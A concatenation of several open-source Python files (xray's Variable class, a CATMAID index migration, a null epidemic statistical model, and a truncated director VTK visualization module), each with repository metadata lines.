to encode this array's data into a serialized format like netCDF4. Currently used keys (for netCDF) include '_FillValue', 'scale_factor', 'add_offset' and 'dtype'. Well behaviored code to serialize a Variable should ignore unrecognized encoding items. """ self._data = _as_compatible_data(data, fastpath=fastpath) self._dims = self._parse_dimensions(dims) self._attrs = None self._encoding = None if attrs is not None: self.attrs = attrs if encoding is not None: self.encoding = encoding @property def dtype(self): return self._data.dtype @property def shape(self): return self._data.shape @property def nbytes(self): return self.size * self.dtype.itemsize @property def _in_memory(self): return isinstance(self._data, (np.ndarray, PandasIndexAdapter)) @property def data(self): if isinstance(self._data, dask_array_type): return self._data else: return self.values @data.setter def data(self, data): data = _as_compatible_data(data) if data.shape != self.shape: raise ValueError( "replacement data must match the Variable's shape") self._data = data def _data_cached(self): if not isinstance(self._data, np.ndarray): self._data = np.asarray(self._data) return self._data @property def _indexable_data(self): return orthogonally_indexable(self._data) def load(self): """Manually trigger loading of this variable's data from disk or a remote source into memory and return this variable. Normally, it should not be necessary to call this method in user code, because all xray functions should either work on deferred data or load data automatically. """ self._data_cached() return self def load_data(self): # pragma: no cover warnings.warn('the Variable method `load_data` has been deprecated; ' 'use `load` instead', FutureWarning, stacklevel=2) return self.load() def __getstate__(self): """Always cache data as an in-memory array before pickling""" self._data_cached() # self.__dict__ is the default pickle object, we don't need to # implement our own __setstate__ method to make pickle work return self.__dict__ @property def values(self): """The variable's data as a numpy.ndarray""" return _as_array_or_item(self._data_cached()) @values.setter def values(self, values): self.data = values def to_variable(self): """Return this variable as a base xray.Variable""" return Variable(self.dims, self._data, self._attrs, encoding=self._encoding, fastpath=True) def to_coord(self): """Return this variable as an xray.Coordinate""" return Coordinate(self.dims, self._data, self._attrs, encoding=self._encoding, fastpath=True) def to_index(self): """Convert this variable to a pandas.Index""" return self.to_coord().to_index() @property def dims(self): """Tuple of dimension names with which this variable is associated. """ return self._dims def _parse_dimensions(self, dims): if isinstance(dims, basestring): dims = (dims,) dims = tuple(dims) if len(dims) != self.ndim: raise ValueError('dimensions %s must have the same length as the ' 'number of data dimensions, ndim=%s' % (dims, self.ndim)) return dims @dims.setter def dims(self, value): self._dims = self._parse_dimensions(value) def _item_key_to_tuple(self, key): if utils.is_dict_like(key): return tuple(key.get(dim, slice(None)) for dim in self.dims) else: return key def __getitem__(self, key): """Return a new Array object whose contents are consistent with getting the provided key from the underlying data. NB. __getitem__ and __setitem__ implement "orthogonal indexing" like netCDF4-python, where the key can only include integers, slices (including `Ellipsis`) and 1d arrays, each of which are applied orthogonally along their respective dimensions. The difference does not matter in most cases unless you are using numpy's "fancy indexing," which can otherwise result in data arrays whose shapes is inconsistent (or just uninterpretable with) with the variable's dimensions. If you really want to do indexing like `x[x > 0]`, manipulate the numpy array `x.values` directly. """ key = self._item_key_to_tuple(key) key = indexing.expanded_indexer(key, self.ndim) dims = tuple(dim for k, dim in zip(key, self.dims) if not isinstance(k, (int, np.integer))) values = self._indexable_data[key] # orthogonal indexing should ensure the dimensionality is consistent if hasattr(values, 'ndim'): assert values.ndim == len(dims), (values.ndim, len(dims)) else: assert len(dims) == 0, len(dims) return type(self)(dims, values, self._attrs, fastpath=True) def __setitem__(self, key, value): """__setitem__ is overloaded to access the underlying numpy values with orthogonal indexing. See __getitem__ for more details. """ key = self._item_key_to_tuple(key) if isinstance(self._data, dask_array_type): raise TypeError("this variable's data is stored in a dask array, " 'which does not support item assignment. To ' 'assign to this variable, you must first load it ' 'into memory explicitly using the .load_data() ' 'method or accessing its .values attribute.') data = orthogonally_indexable(self._data_cached()) data[key] = value @property def attrs(self): """Dictionary of local attributes on this variable. """ if self._attrs is None: self._attrs = OrderedDict() return self._attrs @attrs.setter def attrs(self, value): self._attrs = OrderedDict(value) @property def encoding(self): """Dictionary of encodings on this variable. """ if self._encoding is None: self._encoding = {} return self._encoding @encoding.setter def encoding(self, value): self._encoding = dict(value) def copy(self, deep=True): """Returns a copy of this object. If `deep=True`, the data array is loaded into memory and copied onto the new object. Dimensions, attributes and encodings are always copied. """ data = self.values.copy() if deep else self._data # note: # dims is already an immutable tuple # attributes and encoding will be copied when the new Array is created return type(self)(self.dims, data, self._attrs, self._encoding, fastpath=True) def __copy__(self): return self.copy(deep=False) def __deepcopy__(self, memo=None): # memo does nothing but is required for compatability with # copy.deepcopy return self.copy(deep=True) # mutable objects should not be hashable __hash__ = None @property def chunks(self): """Block dimensions for this array's data or None if it's not a dask array. """ return getattr(self._data, 'chunks', None) _array_counter = itertools.count() def chunk(self, chunks=None, name='', lock=False): """Coerce this array's data into a dask arrays with the given chunks. If this variable is a non-dask array, it will be converted to dask array. If it's a dask array, it will be rechunked to the given chunk sizes. If neither chunks is not provided for one or more dimensions, chunk sizes along that dimension will not be updated; non-dask arrays will be converted into dask arrays with a single block. Parameters ---------- chunks : int, tuple or dict, optional Chunk sizes along each dimension, e.g., ``5``, ``(5, 5)`` or ``{'x': 5, 'y': 5}``. name : str, optional Used to generate the name for this array in the internal dask graph. Does not need not be unique. lock : optional Passed on to :py:func:`dask.array.from_array`, if the array is not already as dask array. Returns ------- chunked : xray.Variable """ import dask.array as da if utils.is_dict_like(chunks): chunks = dict((self.get_axis_num(dim), chunk) for dim, chunk in chunks.items()) if chunks is None: chunks = self.chunks or self.shape data = self._data if isinstance(data, dask_array_type): data = data.rechunk(chunks) else: if name: name += '_' name = 'xray_%s%s' % (name, next(self._array_counter)) if utils.is_dict_like(chunks): chunks = tuple(chunks.get(n, s) for n, s in enumerate(self.shape)) data = da.from_array(data, chunks, name=name, lock=lock) return type(self)(self.dims, data, self._attrs, self._encoding, fastpath=True) def isel(self, **indexers): """Return a new array indexed along the specified dimension(s). Parameters ---------- **indexers : {dim: indexer, ...} Keyword arguments with names matching dimensions and values given by integers, slice objects or arrays. Returns ------- obj : Array object A new Array with the selected data and dimensions. In general, the new variable's data will be a view of this variable's data, unless numpy fancy indexing was triggered by using an array indexer, in which case the data will be a copy. """ invalid = [k for k in indexers if not k in self.dims] if invalid: raise ValueError("dimensions %r do not exist" % invalid) key = [slice(None)] * self.ndim for i, dim in enumerate(self.dims): if dim in indexers: key[i] = indexers[dim] return self[tuple(key)] def transpose(self, *dims): """Return a new Variable object with transposed dimensions. Parameters ---------- *dims : str, optional By default, reverse the dimensions. Otherwise, reorder the dimensions to this order. Returns ------- transposed : Variable The returned object has transposed data and dimensions with the same attributes as the original. Notes ----- Although this operation returns a view of this variable's data, it is not lazy -- the data will be fully loaded. See Also -------- numpy.transpose """ if len(dims) == 0: dims = self.dims[::-1] axes = self.get_axis_num(dims) data = ops.transpose(self.data, axes) return type(self)(dims, data, self._attrs, self._encoding, fastpath=True) def squeeze(self, dim=None): """Return a new Variable object with squeezed data. Parameters ---------- dim : None or str or tuple of str, optional Selects a subset of the length one dimensions. If a dimension is selected with length greater than one, an error is raised. If None, all length one dimensions are squeezed. Returns ------- squeezed : Variable This array, but with with all or a subset of the dimensions of length 1 removed. Notes ----- Although this operation returns a view of this variable's data, it is not lazy -- the data will be fully loaded. See Also -------- numpy.squeeze """ dims = dict(zip(self.dims, self.shape)) return common.squeeze(self, dims, dim) def expand_dims(self, dims, shape=None): """Return a new variable with expanded dimensions. When possible, this operation does not copy this variable's data. Parameters ---------- dims : str or sequence of str or dict Dimensions to include on the new variable. If a dict, values are used to provide the sizes of new dimensions; otherwise, new dimensions are inserted with length 1. Returns ------- Variable """ if isinstance(dims, basestring): dims = [dims] if shape is None and utils.is_dict_like(dims): shape = dims.values() missing_dims = set(self.dims) - set(dims) if missing_dims: raise ValueError('new dimensions must be a superset of existing ' 'dimensions') self_dims = set(self.dims) expanded_dims = tuple(d for d in dims if d not in self_dims) + self.dims if shape is not None: dims_map = dict(zip(dims, shape)) tmp_shape = [dims_map[d] for d in expanded_dims] expanded_data = ops.broadcast_to(self.data, tmp_shape) else: expanded_data = self.data[(None,) * (len(expanded_dims) - self.ndim)] expanded_var = Variable(expanded_dims, expanded_data, self._attrs, self._encoding, fastpath=True) return expanded_var.transpose(*dims) def fillna(self, value): return self._fillna(value) def reduce(self, func, dim=None, axis=None, keep_attrs=False, allow_lazy=False, **kwargs): """Reduce this array by applying `func` along some dimension(s). Parameters ---------- func : function Function which can be called in the form `func(x, axis=axis, **kwargs)` to return the result of reducing an np.ndarray over an integer valued axis. dim : str or sequence of str, optional Dimension(s) over which to apply `func`. axis : int or sequence of int, optional Axis(es) over which to apply `func`. Only one of the 'dim' and 'axis' arguments can be supplied. If neither are supplied, then the reduction is calculated over the flattened array (by calling `func(x)` without an axis argument). keep_attrs : bool, optional If True, the variable's attributes (`attrs`) will be copied from the original object to the new one. If False (default), the new object will be returned without attributes. **kwargs : dict Additional keyword arguments passed on to `func`. Returns ------- reduced : Array Array with summarized data and the indicated dimension(s) removed. """ if dim is not None and axis is not None: raise ValueError("cannot supply both 'axis' and 'dim' arguments") if dim is not None: axis = self.get_axis_num(dim) data = func(self.data if allow_lazy else self.values, axis=axis, **kwargs) removed_axes = (range(self.ndim) if axis is None else np.atleast_1d(axis) % self.ndim) dims = [dim for n, dim in enumerate(self.dims) if n not in removed_axes] attrs = self._attrs if keep_attrs else None return Variable(dims, data, attrs=attrs) @classmethod def concat(cls, variables, dim='concat_dim', indexers=None, shortcut=False): """Concatenate variables along a new or existing dimension. Parameters ---------- variables : iterable of Array Arrays to stack together. Each variable is expected to have matching dimensions and shape except for along the stacked dimension. dim : str or DataArray, optional Name of the dimension to stack along. This can either be a new dimension name, in which case it is added along axis=0, or an existing dimension name, in which case the location of the dimension is unchanged. Where to insert the new dimension is determined by the first variable. indexers : iterable of indexers, optional Iterable of indexers of the same length as variables which specifies how to assign variables along the given dimension. If not supplied, indexers is inferred from the length of each variable along the dimension, and the variables are stacked in the given order. shortcut : bool, optional This option is used internally to speed-up groupby operations. If `shortcut` is True, some checks of internal consistency between arrays to concatenate are skipped. Returns ------- stacked : Variable Concatenated Variable formed by stacking all the supplied variables along the given dimension. """ if not isinstance(dim, basestring): dim, = dim.dims # can't do this lazily: we need to loop through variables at least # twice variables = list(variables) first_var = variables[0] arrays = [v.data for v in variables] # TODO: use our own type promotion rules to ensure that # [str, float] -> object, not str like numpy if dim in first_var.dims: axis = first_var.get_axis_num(dim) dims = first_var.dims if indexers is None: data = ops.concatenate(arrays, axis=axis) else: data = ops.interleaved_concat(arrays, indexers, axis=axis) else: axis = 0 dims = (dim,) + first_var.dims data = ops.stack(arrays, axis=axis) attrs = OrderedDict(first_var.attrs) if not shortcut: for var in variables: if var.dims != first_var.dims: raise ValueError('inconsistent dimensions') utils.remove_incompatible_items(attrs, var.attrs) return cls(dims, data, attrs) def _data_equals(self, other): return (self._data is other._data or ops.array_equiv(self.data, other.data)) def equals(self, other): """True if two Variables have the same dimensions and values; otherwise False. Variables can still be equal (like pandas objects) if they have NaN values in the same locations. This method is necessary because `v1 == v2` for Variables does element-wise comparisions (like numpy.ndarrays). """ other = getattr(other, 'variable', other) try: return (self.dims == other.dims and self._data_equals(other)) except (TypeError, AttributeError): return False def broadcast_equals(self, other): """True if two Variables have the values after being broadcast against each other; otherwise False. Variables can still be equal (like pandas objects) if they have NaN values in the same locations. """ try: self, other = broadcast_variables(self, other) except (ValueError, AttributeError): return False return self.equals(other) def identical(self, other): """Like equals, but also checks attributes. """ try: return (utils.dict_equiv(self.attrs, other.attrs) and self.equals(other)) except (TypeError, AttributeError): return False def __array_wrap__(self, obj, context=None): return Variable(self.dims, obj) @staticmethod def _unary_op(f): @functools.wraps(f) def func(self, *args, **kwargs): return self.__array_wrap__(f(self.data, *args, **kwargs)) return func @staticmethod def _binary_op(f, reflexive=False, **ignored_kwargs): @functools.wraps(f) def func(self, other): if isinstance(other, (xray.DataArray, xray.Dataset)): return NotImplemented self_data, other_data, dims = _broadcast_compat_data(self, other) new_data = (f(self_data, other_data) if not reflexive else f(other_data, self_data)) result = Variable(dims, new_data) return result return func @staticmethod def _inplace_binary_op(f): @functools.wraps(f) def func(self, other): if isinstance(other, xray.Dataset): raise TypeError('cannot add a Dataset to a Variable in-place') self_data, other_data, dims = _broadcast_compat_data(self, other) if dims != self.dims: raise ValueError('dimensions cannot change for in-place ' 'operations') self.values = f(self_data, other_data) return self return func ops.inject_all_ops_and_reduce_methods(Variable) class Coordinate(Variable): """Wrapper around pandas.Index that adds xray specific functionality. The most important difference is that Coordinate objects must always have a name, which is the dimension along which they index values. Coordinates must always be 1-dimensional. In addition to Variable methods and properties (attributes, encoding, broadcasting), they support some pandas.Index methods directly (e.g., get_indexer), even though pandas does not (yet) support duck-typing for indexes. """ def __init__(self, name, data, attrs=None, encoding=None, fastpath=False): super(Coordinate, self).__init__(name, data, attrs, encoding, fastpath) if self.ndim != 1: raise ValueError('%s objects must be 1-dimensional' % type(self).__name__) def _data_cached(self): if not isinstance(self._data, PandasIndexAdapter): self._data = PandasIndexAdapter(self._data) return self._data def __getitem__(self, key): key = self._item_key_to_tuple(key) values = self._indexable_data[key] if not hasattr(values, 'ndim') or values.ndim == 0: return Variable((), values, self._attrs, self._encoding) else: return type(self)(self.dims, values, self._attrs, self._encoding, fastpath=True) def __setitem__(self, key, value): raise TypeError('%s values cannot be modified' % type(self).__name__) def copy(self, deep=True): """Returns a copy of this object. If `deep=True`, the values array is loaded into memory and copied onto the new object. Dimensions, attributes and encodings are always copied. """ # there is no need to copy the index values here even if deep=True # since pandas.Index objects are immutable data = PandasIndexAdapter(self) if deep else self._data return type(self)(self.dims, data, self._attrs, self._encoding, fastpath=True) def _data_equals(self, other): return self.to_index().equals(other.to_index()) def to_coord(self): """Return this variable as an xray.Coordinate""" return self def to_index(self): """Convert this variable to a pandas.Index""" # n.b. creating a new pandas.Index from an old pandas.Index is # basically free as pandas.Index objects are immutable assert self.ndim == 1 return pd.Index(self._data_cached().array, name=self.dims[0]) # pandas.Index like properties: @property def name(self): return self.dims[0] @name.setter def name(self, value): raise AttributeError('cannot modify name of Coordinate in-place') def get_indexer(self, label): return self.to_index().get_indexer(label) def slice_indexer(self, start=None, stop=None, step=None): return self.to_index().slice_indexer(start, stop, step) def slice_locs(self, start=None, stop=None): return self.to_index().slice_locs(start, stop) def get_loc(self, label): return self.to_index().get_loc(label) @property def is_monotonic(self): return self.to_index().is_monotonic def is_numeric(self): return self.to_index().is_numeric() def _unified_dims(variables): # validate dimensions all_dims = OrderedDict() for var in variables: var_dims = var.dims if len(set(var_dims)) < len(var_dims): raise ValueError('broadcasting cannot handle duplicate ' 'dimensions: %r' % list(var_dims)) for d, s in zip(var_dims, var.shape): if d not in all_dims: all_dims[d] = s elif all_dims[d] != s: raise ValueError('operands cannot be broadcast together ' 'with mismatched lengths for dimension %r: %s' % (d, (all_dims[d], s))) return all_dims def _broadcast_compat_variables(*variables): dims = tuple(_unified_dims(variables)) return tuple(var.expand_dims(dims) if var.dims != dims else var for var in variables) def broadcast_variables(*variables): """Given any number of variables, return variables with matching dimensions and broadcast data. The data on the returned variables will be a view of the data on the corresponding original arrays, but dimensions will be reordered and inserted so that both broadcast arrays have the same dimensions. The new dimensions are sorted in order of appearence in the first variable's dimensions followed by the second variable's dimensions. """ dims_map = _unified_dims(variables) dims_tuple = tuple(dims_map) return tuple(var.expand_dims(dims_map) if var.dims != dims_tuple else var for var in variables) def _broadcast_compat_data(self, other): if all(hasattr(other, attr) for attr in ['dims', 'data', 'shape', 'encoding']): # `other` satisfies the necessary Variable API for broadcast_variables new_self, new_other = _broadcast_compat_variables(self, other) self_data = new_self.data other_data = new_other.data dims = new_self.dims else: # rely on numpy broadcasting rules self_data = self.data other_data = other dims = self.dims return self_data, other_data, dims
hetland/xray
xray/core/variable.py
Python
apache-2.0
34,824
[ "NetCDF" ]
531681871002b4354dcf242df4483704cb98bcc00b74090d5343071ef11eb3c7
# -*- coding: utf-8 -*- # Generated by Django 1.10.7 on 2017-07-19 14:36 from django.db import migrations, models forward = """ CREATE INDEX treenode__history_skeleton_id_index ON treenode__history (skeleton_id); CREATE INDEX treenode_connector__history_skeleton_id_index ON treenode_connector__history (skeleton_id); CREATE INDEX review__history_skeleton_id_index ON review__history (skeleton_id); CREATE INDEX class_instance_class_instance__history_class_instance_a_index ON class_instance_class_instance__history (class_instance_a); CREATE INDEX class_instance_class_instance__history_class_instance_b_index ON class_instance_class_instance__history (class_instance_b); CREATE INDEX treenode_class_instance__history_relation_id_index ON treenode_class_instance__history (relation_id); CREATE INDEX treenode_class_instance__history_treenode_id_index ON treenode_class_instance__history (treenode_id ); """ backward = """ DROP INDEX treenode__history_skeleton_id_index; DROP INDEX treenode_connector__history_skeleton_id_index; DROP INDEX review__history_skeleton_id_index; DROP INDEX class_instance_class_instance__history_class_instance_a_index; DROP INDEX class_instance_class_instance__history_class_instance_b_index; DROP INDEX treenode_class_instance__history_relation_id_index; DROP INDEX treenode_class_instance__history_treenode_id_index; """ class Migration(migrations.Migration): """Add indices tnhat improve the performance of some history queries, for instance in the Neuron History Widget or when retrieving historic skeleton data for animation. """ dependencies = [ ('catmaid', '0023_update_edit_txids'), ] operations = [ migrations.RunSQL(forward, backward) ]
tomka/CATMAID
django/applications/catmaid/migrations/0024_add_neuron_history_indices.py
Python
gpl-3.0
1,787
[ "NEURON" ]
f2c47b9e8617f15034cdf3d3fd67c226396195d13a72a5328190a539a6c436b8
"""Null statistical model. Stat model that always returns 0. This is the null model used to compare results with and without a statistical model. """ from typing import Any, Callable import dataclasses from epi_forecast_stat_mech.statistical_models import base @dataclasses.dataclass class Null(base.StatisticalModel): """Null statistical model. Attributes: predict_module: flax.deprecated.nn.Module that takes `inputs` and `output_size` arguments and returns array of shape `[batch, output_size]` that will be used to predict locations of the gaussian distributed `observations` and possibly scales, depending on whether `error_model` is 'full'. log_prior_fn: function that computes log_prior on a parameters of the `predict_module`. """ log_prior_fn: Callable[..., Any] = None def init_parameters(self, rng, covariates, epidemic_observables): """Returns initial parameters generated at model construction time.""" return None def log_prior(self, parameters): """Returns the log probability of `parameters` based on priors. Args: parameters: parameters of the statistical model. Returns: log-probabilities: A scalar """ return 0. def log_likelihood(self, parameters, covariates, observations): """Returns the log likelihood of `observations`. Args: parameters: parameters of the statistical model. covariates: A numpy array of shape "location" x "static_covariate". observations: A tree of mech_params that we want to explain. Returns: A log-likelihood. The return is a scalar (0). """ return 0. def predict(self, parameters, covariates, observations): """Predicts a distribution over `observations` based on `covariates`. Args: parameters: parameters of the statistical model. covariates: array representing covariates for each location. observations: structure of observations to be predicted. Returns: None """ return None, None
HopkinsIDD/EpiForecastStatMech
epi_forecast_stat_mech/statistical_models/no_stat_model.py
Python
apache-2.0
2,024
[ "Gaussian" ]
e3a181cc188faaf23490feb313efe67e0cfa93dcb76fedd29da1c77c291f903d
import director.objectmodel as om import director.applogic as app from shallowCopy import shallowCopy import director.vtkAll as vtk from director import transformUtils from director import callbacks from director import frameupdater from PythonQt import QtCore, QtGui import os import colorsys import weakref import itertools import numpy as np class PolyDataItem(om.ObjectModelItem): defaultScalarRangeMap = { 'intensity' : (400, 4000), 'spindle_angle' : (0, 360), 'azimuth' : (-2.5, 2.5), 'scan_delta' : (0.0, 0.3), 'point distance to plane' : (-0.2, 0.2), 'normal angle to plane' : (0.0, 10.0), } def __init__(self, name, polyData, view): om.ObjectModelItem.__init__(self, name, om.Icons.Robot) self.views = [] self.polyData = polyData self.mapper = vtk.vtkPolyDataMapper() self.mapper.SetInput(self.polyData) self.actor = vtk.vtkActor() self.actor.SetMapper(self.mapper) self.shadowActor = None self.scalarBarWidget = None self.extraViewRenderers = {} self.rangeMap = dict(PolyDataItem.defaultScalarRangeMap) self.addProperty('Color By', 0, attributes=om.PropertyAttributes(enumNames=['Solid Color'])) self.addProperty('Visible', True) self.addProperty('Alpha', 1.0, attributes=om.PropertyAttributes(decimals=2, minimum=0, maximum=1.0, singleStep=0.1, hidden=False)) self.addProperty('Point Size', self.actor.GetProperty().GetPointSize(), attributes=om.PropertyAttributes(decimals=0, minimum=1, maximum=20, singleStep=1, hidden=False)) self.addProperty('Surface Mode', 0, attributes=om.PropertyAttributes(enumNames=['Surface', 'Wireframe', 'Surface with edges', 'Points'], hidden=True)) self.addProperty('Color', [1.0, 1.0, 1.0]) self.addProperty('Show Scalar Bar', False) self._updateSurfaceProperty() self._updateColorByProperty() if view is not None: self.addToView(view) def _renderAllViews(self): for view in self.views: view.render() def hasDataSet(self, dataSet): return dataSet == self.polyData def setPolyData(self, polyData): self.polyData = polyData self.mapper.SetInput(polyData) self._updateSurfaceProperty() self._updateColorByProperty() self._updateColorBy(retainColorMap=True) if self.getProperty('Visible'): self._renderAllViews() def getArrayNames(self): pointData = self.polyData.GetPointData() return [pointData.GetArrayName(i) for i in xrange(pointData.GetNumberOfArrays())] def setSolidColor(self, color): self.setProperty('Color', [float(c) for c in color]) self.colorBy(None) def _isPointCloud(self): return self.polyData.GetNumberOfPoints() and (self.polyData.GetNumberOfCells() == self.polyData.GetNumberOfVerts()) def colorBy(self, arrayName, scalarRange=None, lut=None): if not arrayName: self.mapper.ScalarVisibilityOff() self.polyData.GetPointData().SetActiveScalars(None) return array = self.polyData.GetPointData().GetArray(arrayName) if not array: print 'colorBy(%s): array not found' % arrayName self.mapper.ScalarVisibilityOff() self.polyData.GetPointData().SetActiveScalars(None) return self.polyData.GetPointData().SetActiveScalars(arrayName) if not lut: lut = self._getDefaultColorMap(array, scalarRange) #self.mapper.SetColorModeToMapScalars() self.mapper.ScalarVisibilityOn() self.mapper.SetUseLookupTableScalarRange(True) self.mapper.SetLookupTable(lut) self.mapper.SetInterpolateScalarsBeforeMapping(not self._isPointCloud()) if self.getProperty('Visible'): self._renderAllViews() def getChildFrame(self): frameName = self.getProperty('Name') + ' frame' return self.findChild(frameName) def addToView(self, view): if view in self.views: return self.views.append(view) view.renderer().AddActor(self.actor) if self.shadowActor: view.renderer().AddActor(self.shadowActor) view.render() def _onPropertyChanged(self, propertySet, propertyName): om.ObjectModelItem._onPropertyChanged(self, propertySet, propertyName) if propertyName == 'Point Size': self.actor.GetProperty().SetPointSize(self.getProperty(propertyName)) elif propertyName == 'Alpha': self.actor.GetProperty().SetOpacity(self.getProperty(propertyName)) if self.shadowActor: self.shadowActor.GetProperty().SetOpacity(self.getProperty(propertyName)) elif propertyName == 'Visible': self.actor.SetVisibility(self.getProperty(propertyName)) if self.shadowActor: self.shadowActor.SetVisibility(self.getProperty(propertyName)) elif propertyName == 'Surface Mode': mode = self.properties.getPropertyEnumValue(propertyName) prop = self.actor.GetProperty() if mode == 'Surface': prop.SetRepresentationToSurface() prop.EdgeVisibilityOff() if mode == 'Wireframe': prop.SetRepresentationToWireframe() elif mode == 'Surface with edges': prop.SetRepresentationToSurface() prop.EdgeVisibilityOn() elif mode == 'Points': prop.SetRepresentationToPoints() elif propertyName == 'Color': color = self.getProperty(propertyName) self.actor.GetProperty().SetColor(color) elif propertyName == 'Color By': self._updateColorBy() elif propertyName == 'Show Scalar Bar': self._updateScalarBar() self._renderAllViews() def setScalarRange(self, rangeMin, rangeMax): arrayName = self.getPropertyEnumValue('Color By') if arrayName != 'Solid Color': lut = self.mapper.GetLookupTable() self.colorBy(arrayName, scalarRange=(rangeMin, rangeMax)) def _updateSurfaceProperty(self): enableSurfaceMode = self.polyData.GetNumberOfPolys() or self.polyData.GetNumberOfStrips() self.properties.setPropertyAttribute('Surface Mode', 'hidden', not enableSurfaceMode) def _updateColorBy(self, retainColorMap=False): arrayName = self.getPropertyEnumValue('Color By') if arrayName == 'Solid Color': self.colorBy(None) else: lut = self.mapper.GetLookupTable() if retainColorMap else None self.colorBy(arrayName, lut=lut) self._updateScalarBar() def _updateColorByProperty(self): enumNames = ['Solid Color'] + self.getArrayNames() currentValue = self.properties.getProperty('Color By') if currentValue >= len(enumNames): self.setProperty('Color By', 0) self.properties.setPropertyAttribute('Color By', 'enumNames', enumNames) def _updateScalarBar(self): barEnabled = self.getProperty('Show Scalar Bar') colorBy = self.getProperty('Color By') if barEnabled and colorBy != 0: self._showScalarBar() else: self._hideScalarBar() def _hideScalarBar(self): if self.scalarBarWidget: self.scalarBarWidget.Off() self.scalarBarWidget.SetInteractor(None) self.scalarBarWidget = None self._renderAllViews() def _showScalarBar(self): title = self.properties.getPropertyEnumValue('Color By') view = self.views[0] lut = self.mapper.GetLookupTable() self.scalarBarWidget = createScalarBarWidget(view, lut, title) self._renderAllViews() def _setScalarBarTextColor(self, color=(0,0,0)): act = self.scalarBarWidget.GetScalarBarActor() act.GetTitleTextProperty().SetColor(color) act.GetLabelTextProperty().SetColor(color) def _setScalarBarTitle(self, titleText): act = self.scalarBarWidget.GetScalarBarActor() act.SetTitle(titleText) def getCoolToWarmColorMap(self, scalarRange): f = vtk.vtkDiscretizableColorTransferFunction() f.DiscretizeOn() f.SetColorSpaceToDiverging() f.SetNumberOfValues(256) f.AddRGBPoint(scalarRange[0], 0.23, 0.299, 0.754) f.AddRGBPoint(scalarRange[1], 0.706, 0.016, 0.15) f.Build() return f def _getDefaultColorMap(self, array, scalarRange=None, hueRange=None): name = array.GetName() blueToRed = (0.667, 0) redtoBlue = (0, 0.667) hueMap = { 'Axes' : redtoBlue } scalarRange = scalarRange or self.rangeMap.get(name, array.GetRange()) hueRange = hueRange or hueMap.get(name, blueToRed) lut = vtk.vtkLookupTable() lut.SetNumberOfColors(256) lut.SetHueRange(hueRange) lut.SetRange(scalarRange) lut.Build() return lut #return self.getCoolToWarmColorMap(scalarRange) def shadowOn(self): if self.shadowActor: return mat = [[1, 0, -1, 0], [0, 1, -1, 0], [0, 0, 0, 0], [0, 0, 0, 1]] shadowT = transformUtils.getTransformFromNumpy(mat) baseTransform = self.actor.GetUserTransform() if baseTransform: shadowT.PreMultiply() shadowT.Concatenate(baseTransform) self.shadowActor = vtk.vtkActor() self.shadowActor.SetMapper(self.mapper) self.shadowActor.SetUserTransform(shadowT) self.shadowActor.GetProperty().LightingOff() self.shadowActor.GetProperty().SetColor(0, 0, 0) for view in self.views: view.renderer().AddActor(self.shadowActor) def shadowOff(self): for view in self.views: view.renderer().RemoveActor(self.shadowActor) self.shadowActor = None def onRemoveFromObjectModel(self): om.ObjectModelItem.onRemoveFromObjectModel(self) self.removeFromAllViews() def removeFromAllViews(self): for view in list(self.views): self.removeFromView(view) assert len(self.views) == 0 self._hideScalarBar() def removeFromView(self, view): assert view in self.views self.views.remove(view) view.renderer().RemoveActor(self.actor) if self.shadowActor: view.renderer().RemoveActor(self.shadowActor) for renderer in self.extraViewRenderers.get(view, []): renderer.RemoveActor(self.actor) view.render() class TextItem(om.ObjectModelItem): def __init__(self, name, text='', view=None): om.ObjectModelItem.__init__(self, name) self.views = [] self.actor = vtk.vtkTextActor() prop = self.actor.GetTextProperty() prop.SetFontSize(18) self.actor.SetPosition(10,10) self.actor.SetInput(text) self.addProperty('Visible', True) self.addProperty('Text', text) self.addProperty('Position', [10, 10], attributes=om.PropertyAttributes(minimum=0, maximum=3000, singleStep=1)) self.addProperty('Font Size', 18, attributes=om.PropertyAttributes(minimum=6, maximum=128, singleStep=1)) self.addProperty('Bold', False) self.addProperty('Italic', False) if view: self.addToView(view) def addToView(self, view): if view in self.views: return self.views.append(view) view.renderer().AddActor(self.actor) view.render() def _renderAllViews(self): for view in self.views: view.render() def onRemoveFromObjectModel(self): om.ObjectModelItem.onRemoveFromObjectModel(self) self.removeFromAllViews() def removeFromAllViews(self): for view in list(self.views): self.removeFromView(view) def removeFromView(self, view): assert view in self.views self.views.remove(view) view.renderer().RemoveActor(self.actor) view.render() def _onPropertyChanged(self, propertySet, propertyName): om.ObjectModelItem._onPropertyChanged(self, propertySet, propertyName) if propertyName == 'Visible': self.actor.SetVisibility(self.getProperty(propertyName)) self._renderAllViews() elif propertyName == 'Text': view = app.getCurrentRenderView() self.actor.SetInput(self.getProperty(propertyName)) elif propertyName == 'Position': pos = self.getProperty(propertyName) self.actor.SetPosition(pos[0], pos[1]) elif propertyName == 'Font Size': self.actor.GetTextProperty().SetFontSize(self.getProperty(propertyName)) elif propertyName == 'Bold Size': self.actor.GetTextProperty().SetBold(self.getProperty(propertyName)) elif propertyName == 'Italic': self.actor.GetTextProperty().SetItalic(self.getProperty(propertyName)) if self.getProperty('Visible'): self._renderAllViews() def updateText(text, name, **kwargs): obj = om.findObjectByName(name) obj = obj or showText(text, name, **kwargs) obj.setProperty('Text', text) return obj def showText(text, name, fontSize=18, position=(10, 10), parent=None, view=None): view = view or app.getCurrentRenderView() assert view item = TextItem(name, text, view=view) item.setProperty('Font Size', fontSize) item.setProperty('Position', list(position)) if isinstance(parent, str): parentObj = om.getOrCreateContainer(parent) else: parentObj = parent om.addToObjectModel(item, parentObj) return item class FrameItem(PolyDataItem): def __init__(self, name, transform, view): PolyDataItem.__init__(self, name, vtk.vtkPolyData(), view) self.transform = transform self._blockSignals = False self.actor.SetUserTransform(transform) self.widget = vtk.vtkFrameWidget() self.widget.CreateDefaultRepresentation() self.widget.EnabledOff() self.rep = self.widget.GetRepresentation() self.rep.SetTransform(transform) self.traceData = None self._frameSync = None self.addProperty('Scale', 1.0, attributes=om.PropertyAttributes(decimals=2, minimum=0.01, maximum=100, singleStep=0.1, hidden=False)) self.addProperty('Edit', False) self.addProperty('Trace', False) self.addProperty('Tube', False) self.properties.setPropertyIndex('Edit', 0) self.properties.setPropertyIndex('Trace', 1) self.properties.setPropertyIndex('Tube', 2) self.callbacks.addSignal('FrameModified') self.onTransformModifiedCallback = None self.observerTag = self.transform.AddObserver('ModifiedEvent', self.onTransformModified) self._updateAxesGeometry() self.setProperty('Color By', 'Axes') self.setProperty('Icon', om.Icons.Axes) def connectFrameModified(self, func): return self.callbacks.connect('FrameModified', func) def disconnectFrameModified(self, callbackId): self.callbacks.disconnect(callbackId) def onTransformModified(self, transform, event): if not 